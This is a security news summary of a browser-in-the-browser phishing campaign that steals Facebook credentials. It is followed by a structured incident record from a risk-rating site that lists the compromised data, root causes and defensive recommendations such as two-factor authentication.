Cybercriminals Exploit Browser-in-the-Browser Attacks to Steal Facebook Credentials
Cybersecurity researchers at Trellix have identified a surge in phishing campaigns leveraging browser-in-the-browser (BitB) attacks to steal Facebook login credentials. These sophisticated schemes target the platform’s over three billion users, aiming to hijack accounts for data theft, identity fraud, or scam distribution.
The attacks typically begin with phishing emails designed to trigger panic. Common lures include:
- Fake copyright infringement warnings from law firms.
- False alerts about unauthorized login attempts.
- Urgent notifications claiming an account is about to be shut down due to suspicious activity.
Victims are directed to click shortened, manipulated URLs that appear legitimate. Once clicked, a convincing pop-up window mimics Facebook’s login page, complete with a hardcoded real URL and a fake CAPTCHA to enhance authenticity. The fake authentication flow collects personal details (name, email, phone number, date of birth) before prompting users to "confirm" their password granting attackers full access.
Trellix notes that the BitB technique exploits user familiarity with login processes, making the deception nearly undetectable at a glance. The stolen credentials are then used for further fraud, including account takeovers and spreading scams via victims’ contacts.
While the article suggests mitigation strategies like two-factor authentication (2FA), the focus remains on the attack’s mechanics and its growing prevalence as a threat to Facebook users.
Source: https://www.infosecurity-magazine.com/news/phishing-scams-exploit-browser/
Facebook TPRM report: https://www.rankiteo.com/company/meta
"id": "met1768321762",
"linkid": "meta",
"type": "Cyber Attack",
"date": "1/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'customers_affected': 'Unknown (Potentially '
'large-scale)',
'industry': 'Technology/Social Media',
'name': 'Facebook',
'size': 'Large (Over 3 billion users)',
'type': 'Social Media Platform'}],
'attack_vector': 'Phishing Email',
'customer_advisories': 'Facebook users advised to enable 2FA and recognize '
'phishing attempts',
'data_breach': {'data_exfiltration': 'Yes (via fake authentication screens)',
'personally_identifiable_information': 'Name, Email Address, '
'Phone Number, Date of '
'Birth',
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Login Credentials',
'Personally Identifiable '
'Information (PII)']},
'description': 'Cybercriminals are using a browser-in-the-browser (BitB) '
'attack technique to steal login credentials of Facebook '
'users. The attack involves phishing emails that lure users '
'into fake authentication screens designed to harvest '
'usernames and passwords. The goal is to takeover accounts for '
'identity fraud, data theft, or spreading scams to contacts.',
'impact': {'brand_reputation_impact': "Potential damage to Facebook's "
'reputation due to phishing attacks',
'data_compromised': 'Login Credentials, Personal Information '
'(Name, Email, Phone Number, Date of Birth)',
'identity_theft_risk': 'High'},
'lessons_learned': 'Users should be cautious of unexpected emails, verify '
'URLs before entering credentials, and enable two-factor '
'authentication (2FA) to prevent account takeovers.',
'motivation': ['Identity Fraud', 'Data Theft', 'Scam Distribution'],
'post_incident_analysis': {'corrective_actions': 'User education on phishing, '
'2FA enforcement, and '
'improved detection of fake '
'login pages',
'root_causes': 'Social engineering, fake '
'authentication screens, and user '
'trust in familiar login '
'interfaces'},
'recommendations': ['Enable two-factor authentication (2FA) on all accounts',
'Avoid clicking on unfamiliar links in emails',
'Log in directly via the official website if concerned '
'about account notifications',
'Treat urgent or unexpected requests with suspicion'],
'references': [{'source': 'Trellix'}],
'response': {'communication_strategy': 'Advisories to users on recognizing '
'phishing attempts and enabling 2FA',
'third_party_assistance': 'Trellix (Cybersecurity Research)'},
'title': 'Facebook Credential Theft via Browser-in-the-Browser (BitB) '
'Phishing Attack',
'type': 'Phishing',
'vulnerability_exploited': 'Social Engineering, Fake Authentication Screens'}